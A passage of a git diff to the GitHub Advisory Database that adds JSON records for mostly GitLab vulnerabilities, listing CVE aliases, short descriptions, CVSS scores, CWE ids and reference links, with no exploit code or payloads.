"https://hackerone.com/reports/3234976" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/555440" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-346" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7x5p-82gv-c93r/GHSA-7x5p-82gv-c93r.json b/advisories/unreviewed/2026/02/GHSA-7x5p-82gv-c93r/GHSA-7x5p-82gv-c93r.json new file mode 100644 index 0000000000000..35d006cc01c76 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7x5p-82gv-c93r/GHSA-7x5p-82gv-c93r.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7x5p-82gv-c93r", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1387" + ], + "details": "GitLab has remediated an issue in GitLab EE affecting all versions from 15.6 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an authenticated user to cause Denial of Service by uploading a malicious file and repeatedly querying it through GraphQl.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1387" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3515994" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/587546" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-83gj-2vrh-jvx9/GHSA-83gj-2vrh-jvx9.json b/advisories/unreviewed/2026/02/GHSA-83gj-2vrh-jvx9/GHSA-83gj-2vrh-jvx9.json new file mode 100644 index 0000000000000..2550524aae1c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-83gj-2vrh-jvx9/GHSA-83gj-2vrh-jvx9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83gj-2vrh-jvx9", + "modified": "2026-02-11T12:30:21Z", + "published": "2026-02-11T12:30:21Z", + "aliases": [ + "CVE-2025-10174" + ], + "details": "Cleartext Transmission of Sensitive Information vulnerability in Pan Software & Information Technologies Ltd. PanCafe Pro allows Flooding.This issue affects PanCafe Pro: from < 3.3.2 through 23092025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10174" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0058" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8f2f-6w9m-mg42/GHSA-8f2f-6w9m-mg42.json b/advisories/unreviewed/2026/02/GHSA-8f2f-6w9m-mg42/GHSA-8f2f-6w9m-mg42.json new file mode 100644 index 0000000000000..b76bff71c69d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8f2f-6w9m-mg42/GHSA-8f2f-6w9m-mg42.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8f2f-6w9m-mg42", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1282" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an authenticated user to inject malicious content into project labels titles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1282" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3505596" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/587106" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-80" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-95p8-ccjw-3g7f/GHSA-95p8-ccjw-3g7f.json b/advisories/unreviewed/2026/02/GHSA-95p8-ccjw-3g7f/GHSA-95p8-ccjw-3g7f.json new file mode 100644 index 0000000000000..04759c657c57f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-95p8-ccjw-3g7f/GHSA-95p8-ccjw-3g7f.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-95p8-ccjw-3g7f", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1094" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.8 before 18.8.4 that could have allowed an authenticated developer to hide specially crafted file changes from the WebUI.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1094" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3502519" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/586483" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1289" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9fx3-39vw-q4x9/GHSA-9fx3-39vw-q4x9.json b/advisories/unreviewed/2026/02/GHSA-9fx3-39vw-q4x9/GHSA-9fx3-39vw-q4x9.json new file mode 100644 index 0000000000000..4e8bdd2fe14fe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9fx3-39vw-q4x9/GHSA-9fx3-39vw-q4x9.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9fx3-39vw-q4x9", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-0958" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an unauthenticated user to cause denial of service through memory or CPU exhaustion by bypassing JSON validation middleware limits.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0958" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3463363" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/586202" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-436" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf2v-m456-7qjf/GHSA-cf2v-m456-7qjf.json b/advisories/unreviewed/2026/02/GHSA-cf2v-m456-7qjf/GHSA-cf2v-m456-7qjf.json new file mode 100644 index 0000000000000..fcb053adc5a8b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf2v-m456-7qjf/GHSA-cf2v-m456-7qjf.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf2v-m456-7qjf", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-0595" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.9 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to add unauthorized email addresses to victim accounts through HTML injection in test case titles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0595" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3486862" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/584975" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gvr9-jwjx-g2pq/GHSA-gvr9-jwjx-g2pq.json b/advisories/unreviewed/2026/02/GHSA-gvr9-jwjx-g2pq/GHSA-gvr9-jwjx-g2pq.json new file mode 100644 index 0000000000000..14d84e057fd62 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gvr9-jwjx-g2pq/GHSA-gvr9-jwjx-g2pq.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvr9-jwjx-g2pq", + "modified": "2026-02-11T12:30:21Z", + "published": "2026-02-11T12:30:21Z", + "aliases": [ + "CVE-2025-14560" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.1 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to perform unauthorized actions on behalf of another user by injecting malicious content into vulnerability code flow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14560" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3461083" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/583861" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hfx3-365h-vfrv/GHSA-hfx3-365h-vfrv.json b/advisories/unreviewed/2026/02/GHSA-hfx3-365h-vfrv/GHSA-hfx3-365h-vfrv.json new file mode 100644 index 0000000000000..fdb8abe704250 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hfx3-365h-vfrv/GHSA-hfx3-365h-vfrv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hfx3-365h-vfrv", + "modified": "2026-02-11T12:30:21Z", + "published": "2026-02-11T12:30:21Z", + "aliases": [ + "CVE-2025-12073" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.0 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions, could have allowed an authenticated user to perform server-side request forgery against internal services by bypassing protections in the Git repository import functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12073" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3314987" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/578091" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json b/advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json new file mode 100644 index 0000000000000..5dbb3e2b3a123 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m668-xfwp-34x6", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1458" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.0 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an unauthenticated user to cause denial of service by uploading malicious files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1458" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3517644" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/587698" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mqfv-j8mc-8hp5/GHSA-mqfv-j8mc-8hp5.json b/advisories/unreviewed/2026/02/GHSA-mqfv-j8mc-8hp5/GHSA-mqfv-j8mc-8hp5.json new file mode 100644 index 0000000000000..b3d8238b952f7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mqfv-j8mc-8hp5/GHSA-mqfv-j8mc-8hp5.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqfv-j8mc-8hp5", + "modified": "2026-02-11T12:30:21Z", + "published": "2026-02-11T12:30:21Z", + "aliases": [ + "CVE-2025-12575" + ], + "details": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.0 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user with certain permissions to make unauthorized requests to internal network services through the GitLab server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12575" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3397752" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/579171" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p7j7-2wwv-p5hw/GHSA-p7j7-2wwv-p5hw.json b/advisories/unreviewed/2026/02/GHSA-p7j7-2wwv-p5hw/GHSA-p7j7-2wwv-p5hw.json new file mode 100644 index 0000000000000..52903f7fc4727 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p7j7-2wwv-p5hw/GHSA-p7j7-2wwv-p5hw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7j7-2wwv-p5hw", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2025-8099" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.8 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions, could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8099" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3240210" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/557165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w487-9r9p-6p96/GHSA-w487-9r9p-6p96.json b/advisories/unreviewed/2026/02/GHSA-w487-9r9p-6p96/GHSA-w487-9r9p-6p96.json new file mode 100644 index 0000000000000..cbdeadfd0be3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w487-9r9p-6p96/GHSA-w487-9r9p-6p96.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w487-9r9p-6p96", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1456" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.7 before 18.7.4, and 18.8 before 18.8.4 that could have allowed an unauthenticated user to cause denial of service through CPU exhaustion by submitting specially crafted markdown files that trigger exponential processing in markdown preview.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1456" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3517928" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/587688" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x35m-4mv2-6m4p/GHSA-x35m-4mv2-6m4p.json b/advisories/unreviewed/2026/02/GHSA-x35m-4mv2-6m4p/GHSA-x35m-4mv2-6m4p.json new file mode 100644 index 0000000000000..752bffb7e51a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x35m-4mv2-6m4p/GHSA-x35m-4mv2-6m4p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x35m-4mv2-6m4p", + "modified": "2026-02-11T12:30:21Z", + "published": "2026-02-11T12:30:21Z", + "aliases": [ + "CVE-2025-15096" + ], + "details": "The 'Videospirecore Theme Plugin' plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.6. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15096" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/videospire-video-streaming-ott-platform-wordpress-theme/39243225?s_rank=1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf152269-73e1-473f-8d97-ce94e9b885d0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T10:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x398-2rgf-67p8/GHSA-x398-2rgf-67p8.json b/advisories/unreviewed/2026/02/GHSA-x398-2rgf-67p8/GHSA-x398-2rgf-67p8.json new file mode 100644 index 0000000000000..bebb13d60a542 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x398-2rgf-67p8/GHSA-x398-2rgf-67p8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x398-2rgf-67p8", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1080" + ], + "details": "GitLab has remediated an issue in GitLab EE affecting all versions from 16.7 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to access iteration data from private descendant groups by querying the iterations API endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1080" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3484568" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/586477" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json b/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json index 8b09e8c0cad7c..b74910b439200 100644 --- a/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json +++ b/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x566-frf2-p8rw", - "modified": "2026-02-11T09:30:17Z", + "modified": "2026-02-11T12:30:21Z", "published": "2026-02-09T12:30:22Z", "aliases": [ "CVE-2025-6830" diff --git a/advisories/unreviewed/2026/02/GHSA-xfh9-f34g-8fm7/GHSA-xfh9-f34g-8fm7.json b/advisories/unreviewed/2026/02/GHSA-xfh9-f34g-8fm7/GHSA-xfh9-f34g-8fm7.json new file mode 100644 index 0000000000000..8de8d1276d583 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfh9-f34g-8fm7/GHSA-xfh9-f34g-8fm7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfh9-f34g-8fm7", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2025-14592" + ], + "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to perform unauthorized operations by submitting GraphQL mutations through the GLQL API endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14592" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3451435" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/583961" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:03Z" + } +} \ No newline at end of file From 763aa34bb3482490ec9c6d5408694d03b42a7e1d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 14:15:12 +0000 Subject: [PATCH 004/215] Publish Advisories GHSA-r8xr-pgv5-gxw3 GHSA-7c3f-cg9x-f3gr GHSA-654x-9q7r-g966 GHSA-r6ph-v2qm-q3c2 GHSA-vm6g-8r4h-22x8 --- .../GHSA-r8xr-pgv5-gxw3.json | 5 +++-- .../GHSA-7c3f-cg9x-f3gr.json | 6 +++++- .../GHSA-654x-9q7r-g966.json | 3 ++- .../GHSA-r6ph-v2qm-q3c2.json | 19 ++++++++++++++++--- .../GHSA-vm6g-8r4h-22x8.json | 8 ++++++-- 5 files changed, 32 insertions(+), 9 deletions(-) diff --git a/advisories/github-reviewed/2025/06/GHSA-r8xr-pgv5-gxw3/GHSA-r8xr-pgv5-gxw3.json b/advisories/github-reviewed/2025/06/GHSA-r8xr-pgv5-gxw3/GHSA-r8xr-pgv5-gxw3.json index 3677134d7a73b..938b8c9d1519e 100644 --- a/advisories/github-reviewed/2025/06/GHSA-r8xr-pgv5-gxw3/GHSA-r8xr-pgv5-gxw3.json +++ b/advisories/github-reviewed/2025/06/GHSA-r8xr-pgv5-gxw3/GHSA-r8xr-pgv5-gxw3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r8xr-pgv5-gxw3", - "modified": "2025-06-10T19:59:36Z", + "modified": "2026-02-11T14:14:28Z", "published": "2025-06-09T06:30:21Z", "aliases": [ "CVE-2025-25207" @@ -55,7 +55,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2025/09/GHSA-7c3f-cg9x-f3gr/GHSA-7c3f-cg9x-f3gr.json b/advisories/github-reviewed/2025/09/GHSA-7c3f-cg9x-f3gr/GHSA-7c3f-cg9x-f3gr.json index 5c8be104acf88..bee20ed78d75c 100644 --- a/advisories/github-reviewed/2025/09/GHSA-7c3f-cg9x-f3gr/GHSA-7c3f-cg9x-f3gr.json +++ b/advisories/github-reviewed/2025/09/GHSA-7c3f-cg9x-f3gr/GHSA-7c3f-cg9x-f3gr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7c3f-cg9x-f3gr", - "modified": "2026-01-09T19:55:24Z", + "modified": "2026-02-11T14:12:50Z", "published": "2025-09-16T18:31:27Z", "aliases": [ "CVE-2025-10492" @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://community.jaspersoft.com/advisories/jaspersoft-security-advisory-september-16-2025-jaspersoft-library-cve-2025-10492-r6" }, + { + "type": "WEB", + "url": "https://community.jaspersoft.com/forums/topic/69926-cve-2025-10492-%E2%80%93-no-fix-available-after-jasperreports-upgrade-community-edition" + }, { "type": "PACKAGE", "url": "https://github.com/Jaspersoft/jasperreports" diff --git a/advisories/github-reviewed/2026/02/GHSA-654x-9q7r-g966/GHSA-654x-9q7r-g966.json b/advisories/github-reviewed/2026/02/GHSA-654x-9q7r-g966/GHSA-654x-9q7r-g966.json index 8d77d104982f0..c6e0be6998a82 100644 --- a/advisories/github-reviewed/2026/02/GHSA-654x-9q7r-g966/GHSA-654x-9q7r-g966.json +++ b/advisories/github-reviewed/2026/02/GHSA-654x-9q7r-g966/GHSA-654x-9q7r-g966.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-654x-9q7r-g966", - "modified": "2026-02-04T17:45:55Z", + "modified": "2026-02-11T14:14:07Z", "published": "2026-02-02T21:52:06Z", "aliases": [ "CVE-2026-25509" @@ -55,6 +55,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-203", "CWE-204" ], "severity": "MODERATE", diff --git a/advisories/github-reviewed/2026/02/GHSA-r6ph-v2qm-q3c2/GHSA-r6ph-v2qm-q3c2.json 